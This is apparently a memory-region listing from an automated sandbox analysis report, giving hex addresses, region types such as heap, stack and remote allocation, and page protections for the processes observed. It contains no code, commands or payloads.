23E03560000
|
heap
|
page readonly
|
||
1C101120000
|
trusted library allocation
|
page read and write
|
||
2510160E000
|
trusted library allocation
|
page read and write
|
||
251789A8000
|
heap
|
page read and write
|
||
251013F2000
|
trusted library allocation
|
page read and write
|
||
1EB65420000
|
heap
|
page read and write
|
||
2866F82D000
|
heap
|
page read and write
|
||
251018EF000
|
trusted library allocation
|
page read and write
|
||
11669BB000
|
stack
|
page read and write
|
||
25101CBF000
|
trusted library allocation
|
page read and write
|
||
25101C0E000
|
trusted library allocation
|
page read and write
|
||
25178833000
|
heap
|
page read and write
|
||
25101BCD000
|
trusted library allocation
|
page read and write
|
||
1BDAE2C0000
|
heap
|
page read and write
|
||
1BDC8420000
|
heap
|
page read and write
|
||
25101C5F000
|
trusted library allocation
|
page read and write
|
||
900000
|
heap
|
page read and write
|
||
19979AEF000
|
heap
|
page read and write
|
||
2866F6DE000
|
heap
|
page read and write
|
||
25101CA7000
|
trusted library allocation
|
page read and write
|
||
28653730000
|
heap
|
page read and write
|
||
7FFD34880000
|
trusted library allocation
|
page read and write
|
||
7FFD347B3000
|
trusted library allocation
|
page read and write
|
||
251015B5000
|
trusted library allocation
|
page read and write
|
||
1ABE005D000
|
heap
|
page read and write
|
||
2866FB3D000
|
heap
|
page read and write
|
||
25101BE4000
|
trusted library allocation
|
page read and write
|
||
7FFD3454C000
|
trusted library allocation
|
page execute and read and write
|
||
25101ABE000
|
trusted library allocation
|
page read and write
|
||
6C6E9FF000
|
stack
|
page read and write
|
||
5BBCDFD000
|
stack
|
page read and write
|
||
25101283000
|
trusted library allocation
|
page read and write
|
||
25101B3F000
|
trusted library allocation
|
page read and write
|
||
2866F874000
|
heap
|
page read and write
|
||
1995F847000
|
heap
|
page read and write
|
||
1ABF9F8C000
|
heap
|
page read and write
|
||
7FFD34576000
|
trusted library allocation
|
page execute and read and write
|
||
23E042C3000
|
trusted library allocation
|
page read and write
|
||
937C3F7000
|
stack
|
page read and write
|
||
25101B97000
|
trusted library allocation
|
page read and write
|
||
25101ACB000
|
trusted library allocation
|
page read and write
|
||
1460000
|
heap
|
page read and write
|
||
251016E6000
|
trusted library allocation
|
page read and write
|
||
1C176DFF000
|
heap
|
page read and write
|
||
25101759000
|
trusted library allocation
|
page read and write
|
||
25110140000
|
trusted library allocation
|
page read and write
|
||
2510184C000
|
trusted library allocation
|
page read and write
|
||
251019E0000
|
trusted library allocation
|
page read and write
|
||
937D48C000
|
stack
|
page read and write
|
||
15EB4570000
|
heap
|
page read and write
|
||
3FC51FE000
|
stack
|
page read and write
|
||
3FC4982000
|
stack
|
page read and write
|
||
2C7F000
|
stack
|
page read and write
|
||
23E03A10000
|
heap
|
page execute and read and write
|
||
1110000
|
heap
|
page read and write
|
||
251016FB000
|
trusted library allocation
|
page read and write
|
||
3FC4D7F000
|
stack
|
page read and write
|
||
2510150D000
|
trusted library allocation
|
page read and write
|
||
25101AC4000
|
trusted library allocation
|
page read and write
|
||
1BDAE570000
|
heap
|
page read and write
|
||
25101B49000
|
trusted library allocation
|
page read and write
|
||
7FFD3464A000
|
trusted library allocation
|
page read and write
|
||
7FFD346A0000
|
trusted library allocation
|
page read and write
|
||
F6F8AFE000
|
stack
|
page read and write
|
||
1BDAE320000
|
heap
|
page read and write
|
||
251014A4000
|
trusted library allocation
|
page read and write
|
||
937C83C000
|
stack
|
page read and write
|
||
25101BBA000
|
trusted library allocation
|
page read and write
|
||
15EB4661000
|
heap
|
page read and write
|
||
2866F615000
|
heap
|
page read and write
|
||
25101439000
|
trusted library allocation
|
page read and write
|
||
7DF49DDA0000
|
trusted library allocation
|
page execute and read and write
|
||
25101AFB000
|
trusted library allocation
|
page read and write
|
||
25101B76000
|
trusted library allocation
|
page read and write
|
||
28653660000
|
heap
|
page read and write
|
||
7FFD347E4000
|
trusted library allocation
|
page read and write
|
||
1C101DDA000
|
trusted library allocation
|
page read and write
|
||
7FFD34790000
|
trusted library allocation
|
page read and write
|
||
7FFD34760000
|
trusted library allocation
|
page read and write
|
||
1ABE01C0000
|
trusted library allocation
|
page read and write
|
||
1EB657A3000
|
heap
|
page read and write
|
||
25101B26000
|
trusted library allocation
|
page read and write
|
||
25101742000
|
trusted library allocation
|
page read and write
|
||
1ABFA322000
|
heap
|
page read and write
|
||
199616C0000
|
heap
|
page execute and read and write
|
||
1BDAE361000
|
heap
|
page read and write
|
||
1EB4D844000
|
trusted library allocation
|
page read and write
|
||
937C738000
|
stack
|
page read and write
|
||
7FFD34800000
|
trusted library allocation
|
page read and write
|
||
25101ADB000
|
trusted library allocation
|
page read and write
|
||
15EB4624000
|
heap
|
page read and write
|
||
25101592000
|
trusted library allocation
|
page read and write
|
||
15ECE4F0000
|
heap
|
page read and write
|
||
23E01AC6000
|
heap
|
page read and write
|
||
7FFD347C0000
|
trusted library allocation
|
page read and write
|
||
25101A0C000
|
trusted library allocation
|
page read and write
|
||
251017EF000
|
trusted library allocation
|
page read and write
|
||
25101AC2000
|
trusted library allocation
|
page read and write
|
||
1ABF1DCA000
|
trusted library allocation
|
page read and write
|
||
7FFD347F0000
|
trusted library allocation
|
page read and write
|
||
251018D8000
|
trusted library allocation
|
page read and write
|
||
7FFD34780000
|
trusted library allocation
|
page read and write
|
||
25101A95000
|
trusted library allocation
|
page read and write
|
||
CFC000
|
stack
|
page read and write
|
||
25101681000
|
trusted library allocation
|
page read and write
|
||
7FFD34672000
|
trusted library allocation
|
page read and write
|
||
7FFD34494000
|
trusted library allocation
|
page read and write
|
||
15ECE5E0000
|
heap
|
page execute and read and write
|
||
25101AE6000
|
trusted library allocation
|
page read and write
|
||
2866D8F8000
|
heap
|
page read and write
|
||
25101AA0000
|
trusted library allocation
|
page read and write
|
||
7FFD34760000
|
trusted library allocation
|
page read and write
|
||
2866D8F8000
|
heap
|
page read and write
|
||
2510154E000
|
trusted library allocation
|
page read and write
|
||
2510132E000
|
trusted library allocation
|
page read and write
|
||
2866F673000
|
heap
|
page read and write
|
||
7FFD34540000
|
trusted library allocation
|
page read and write
|
||
F5EE2FE000
|
stack
|
page read and write
|
||
1EB4D820000
|
trusted library allocation
|
page read and write
|
||
1EB4B47D000
|
heap
|
page read and write
|
||
25101A22000
|
trusted library allocation
|
page read and write
|
||
1995F83B000
|
heap
|
page read and write
|
||
11A0000
|
heap
|
page read and write
|
||
F6F933B000
|
stack
|
page read and write
|
||
1EB5D3C9000
|
trusted library allocation
|
page read and write
|
||
25101C23000
|
trusted library allocation
|
page read and write
|
||
7FFD34900000
|
trusted library allocation
|
page read and write
|
||
25101792000
|
trusted library allocation
|
page read and write
|
||
25101894000
|
trusted library allocation
|
page read and write
|
||
7FFD347D0000
|
trusted library allocation
|
page read and write
|
||
1C17528E000
|
heap
|
page read and write
|
||
57E8ACD000
|
stack
|
page read and write
|
||
7FFD3448D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD34546000
|
trusted library allocation
|
page read and write
|
||
19961FC6000
|
trusted library allocation
|
page read and write
|
||
25101B58000
|
trusted library allocation
|
page read and write
|
||
1EB4D7F6000
|
trusted library allocation
|
page read and write
|
||
7FFD34576000
|
trusted library allocation
|
page execute and read and write
|
||
19961C35000
|
trusted library allocation
|
page read and write
|
||
7FFD34780000
|
trusted library allocation
|
page read and write
|
||
1C17759A000
|
heap
|
page read and write
|
||
7FFD34810000
|
trusted library allocation
|
page read and write
|
||
19971789000
|
trusted library allocation
|
page read and write
|
||
23E03F0C000
|
trusted library allocation
|
page read and write
|
||
1EB4D80E000
|
trusted library allocation
|
page read and write
|
||
1C17526D000
|
heap
|
page read and write
|
||
15EB6190000
|
heap
|
page read and write
|
||
23E03F1D000
|
trusted library allocation
|
page read and write
|
||
286536E5000
|
heap
|
page read and write
|
||
251019DC000
|
trusted library allocation
|
page read and write
|
||
2866FB11000
|
heap
|
page read and write
|
||
25101B52000
|
trusted library allocation
|
page read and write
|
||
2510160C000
|
trusted library allocation
|
page read and write
|
||
251018DC000
|
trusted library allocation
|
page read and write
|
||
25101B2D000
|
trusted library allocation
|
page read and write
|
||
57E8A4E000
|
stack
|
page read and write
|
||
DD0000
|
heap
|
page read and write
|
||
25101864000
|
trusted library allocation
|
page read and write
|
||
1ABE0210000
|
heap
|
page read and write
|
||
25101B56000
|
trusted library allocation
|
page read and write
|
||
7FFD344A0000
|
trusted library allocation
|
page read and write
|
||
251017C7000
|
trusted library allocation
|
page read and write
|
||
25101A08000
|
trusted library allocation
|
page read and write
|
||
7FFD34700000
|
trusted library allocation
|
page read and write
|
||
25101A62000
|
trusted library allocation
|
page read and write
|
||
7FFD348B0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD346D0000
|
trusted library allocation
|
page read and write
|
||
7FFD34740000
|
trusted library allocation
|
page read and write
|
||
25101B62000
|
trusted library allocation
|
page read and write
|
||
1EB4B491000
|
heap
|
page read and write
|
||
2510191F000
|
trusted library allocation
|
page read and write
|
||
2866F856000
|
heap
|
page read and write
|
||
1ABF1AE1000
|
trusted library allocation
|
page read and write
|
||
1C1018EF000
|
trusted library allocation
|
page read and write
|
||
25101B66000
|
trusted library allocation
|
page read and write
|
||
25101780000
|
trusted library allocation
|
page read and write
|
||
7FFD346CC000
|
trusted library allocation
|
page read and write
|
||
474000
|
remote allocation
|
page execute and read and write
|
||
25101AFF000
|
trusted library allocation
|
page read and write
|
||
7FFD34680000
|
trusted library allocation
|
page read and write
|
||
2866F6DE000
|
heap
|
page read and write
|
||
2510125E000
|
trusted library allocation
|
page read and write
|
||
5BBCCFE000
|
stack
|
page read and write
|
||
4919F3E000
|
stack
|
page read and write
|
||
2866F6DE000
|
heap
|
page read and write
|
||
F6F8DFF000
|
stack
|
page read and write
|
||
7FFD34632000
|
trusted library allocation
|
page read and write
|
||
1C1752B9000
|
heap
|
page read and write
|
||
7FFD34700000
|
trusted library allocation
|
page read and write
|
||
251017FF000
|
trusted library allocation
|
page read and write
|
||
7FFD3449D000
|
trusted library allocation
|
page execute and read and write
|
||
25101994000
|
trusted library allocation
|
page read and write
|
||
3FC52F8000
|
stack
|
page read and write
|
||
1ABE0048000
|
heap
|
page read and write
|
||
25101B7D000
|
trusted library allocation
|
page read and write
|
||
251015A5000
|
trusted library allocation
|
page read and write
|
||
7FFD3449D000
|
trusted library allocation
|
page execute and read and write
|
||
49196C3000
|
stack
|
page read and write
|
||
1ABFA114000
|
heap
|
page read and write
|
||
1BDC83B5000
|
heap
|
page read and write
|
||
1EB5D540000
|
trusted library allocation
|
page read and write
|
||
7FFD346F0000
|
trusted library allocation
|
page read and write
|
||
115E000
|
stack
|
page read and write
|
||
1ABE009E000
|
heap
|
page read and write
|
||
7FFD347F8000
|
trusted library allocation
|
page read and write
|
||
5BBCBFC000
|
stack
|
page read and write
|
||
25101A60000
|
trusted library allocation
|
page read and write
|
||
1BDB031C000
|
trusted library allocation
|
page read and write
|
||
199798A6000
|
heap
|
page read and write
|
||
25101383000
|
trusted library allocation
|
page read and write
|
||
251018D6000
|
trusted library allocation
|
page read and write
|
||
2510146E000
|
trusted library allocation
|
page read and write
|
||
116657E000
|
stack
|
page read and write
|
||
251018CE000
|
trusted library allocation
|
page read and write
|
||
286536E0000
|
heap
|
page read and write
|
||
23E1BE90000
|
heap
|
page read and write
|
||
19979820000
|
heap
|
page read and write
|
||
251017E9000
|
trusted library allocation
|
page read and write
|
||
25101AF6000
|
trusted library allocation
|
page read and write
|
||
2510163D000
|
trusted library allocation
|
page read and write
|
||
1BDB04AC000
|
trusted library allocation
|
page read and write
|
||
1C176DD9000
|
heap
|
page read and write
|
||
25101BAE000
|
trusted library allocation
|
page read and write
|
||
7FFD34690000
|
trusted library allocation
|
page read and write
|
||
7FFD346F0000
|
trusted library allocation
|
page read and write
|
||
251019D8000
|
trusted library allocation
|
page read and write
|
||
7FFD347C0000
|
trusted library allocation
|
page read and write
|
||
7FFD347E8000
|
trusted library allocation
|
page read and write
|
||
251014A1000
|
trusted library allocation
|
page read and write
|
||
7FFD34490000
|
trusted library allocation
|
page read and write
|
||
1C175070000
|
heap
|
page read and write
|
||
7FFD347B0000
|
trusted library allocation
|
page read and write
|
||
25101C00000
|
trusted library allocation
|
page read and write
|
||
1C100D79000
|
trusted library allocation
|
page read and write
|
||
25101C3D000
|
trusted library allocation
|
page read and write
|
||
1ABE1B5E000
|
trusted library allocation
|
page read and write
|
||
25101678000
|
trusted library allocation
|
page read and write
|
||
25101B6F000
|
trusted library allocation
|
page read and write
|
||
6C6ED79000
|
stack
|
page read and write
|
||
7FFD34494000
|
trusted library allocation
|
page read and write
|
||
25101AB0000
|
trusted library allocation
|
page read and write
|
||
25101977000
|
trusted library allocation
|
page read and write
|
||
25101CB7000
|
trusted library allocation
|
page read and write
|
||
7FFD347F2000
|
trusted library allocation
|
page read and write
|
||
251017BF000
|
trusted library allocation
|
page read and write
|
||
25101C63000
|
trusted library allocation
|
page read and write
|
||
7FFD346D0000
|
trusted library allocation
|
page read and write
|
||
1ABE2EA1000
|
trusted library allocation
|
page read and write
|
||
6C6E97F000
|
stack
|
page read and write
|
||
7FFD344A0000
|
trusted library allocation
|
page read and write
|
||
25101A69000
|
trusted library allocation
|
page read and write
|
||
6C6FA4E000
|
stack
|
page read and write
|
||
251018A0000
|
trusted library allocation
|
page read and write
|
||
491A13B000
|
stack
|
page read and write
|
||
25101C39000
|
trusted library allocation
|
page read and write
|
||
7FFD34720000
|
trusted library allocation
|
page read and write
|
||
25101A0E000
|
trusted library allocation
|
page read and write
|
||
1ABFA312000
|
heap
|
page read and write
|
||
7FFD34770000
|
trusted library allocation
|
page read and write
|
||
1ABE38FD000
|
trusted library allocation
|
page read and write
|
||
25101823000
|
trusted library allocation
|
page read and write
|
||
251015A7000
|
trusted library allocation
|
page read and write
|
||
7FFD344BD000
|
trusted library allocation
|
page execute and read and write
|
||
FA0000
|
heap
|
page read and write
|
||
7FFD3489C000
|
trusted library allocation
|
page read and write
|
||
251017C5000
|
trusted library allocation
|
page read and write
|
||
57E797E000
|
stack
|
page read and write
|
||
7FFD34880000
|
trusted library allocation
|
page read and write
|
||
251014C0000
|
trusted library allocation
|
page read and write
|
||
8FC000
|
stack
|
page read and write
|
||
2866F675000
|
heap
|
page read and write
|
||
7FFD347A0000
|
trusted library allocation
|
page read and write
|
||
1ABF1B11000
|
trusted library allocation
|
page read and write
|
||
23E1BCD0000
|
heap
|
page read and write
|
||
1ABFA2D0000
|
heap
|
page read and write
|
||
1C11006D000
|
trusted library allocation
|
page read and write
|
||
19962192000
|
trusted library allocation
|
page read and write
|
||
23E1BC10000
|
heap
|
page read and write
|
||
251789BC000
|
heap
|
page read and write
|
||
1EB4D9FC000
|
trusted library allocation
|
page read and write
|
||
25101687000
|
trusted library allocation
|
page read and write
|
||
25101BE8000
|
trusted library allocation
|
page read and write
|
||
25101731000
|
trusted library allocation
|
page read and write
|
||
25101B31000
|
trusted library allocation
|
page read and write
|
||
7FFD34670000
|
trusted library allocation
|
page execute and read and write
|
||
2517882F000
|
heap
|
page read and write
|
||
937C2FA000
|
stack
|
page read and write
|
||
251019A8000
|
trusted library allocation
|
page read and write
|
||
1996193C000
|
trusted library allocation
|
page read and write
|
||
2510184E000
|
trusted library allocation
|
page read and write
|
||
7FFD346F0000
|
trusted library allocation
|
page read and write
|
||
25101967000
|
trusted library allocation
|
page read and write
|
||
25101983000
|
trusted library allocation
|
page read and write
|
||
2866F673000
|
heap
|
page read and write
|
||
25101466000
|
trusted library allocation
|
page read and write
|
||
15EB6014000
|
heap
|
page read and write
|
||
251766E0000
|
heap
|
page read and write
|
||
7FFD346E0000
|
trusted library allocation
|
page read and write
|
||
1ABF1B13000
|
trusted library allocation
|
page read and write
|
||
19979AB5000
|
heap
|
page read and write
|
||
251013D3000
|
trusted library allocation
|
page read and write
|
||
7FFD34730000
|
trusted library allocation
|
page read and write
|
||
25101BDD000
|
trusted library allocation
|
page read and write
|
||
7FFD34494000
|
trusted library allocation
|
page read and write
|
||
937C93B000
|
stack
|
page read and write
|
||
317F000
|
stack
|
page read and write
|
||
19971739000
|
trusted library allocation
|
page read and write
|
There are 2051 hidden memdumps, click here to show them.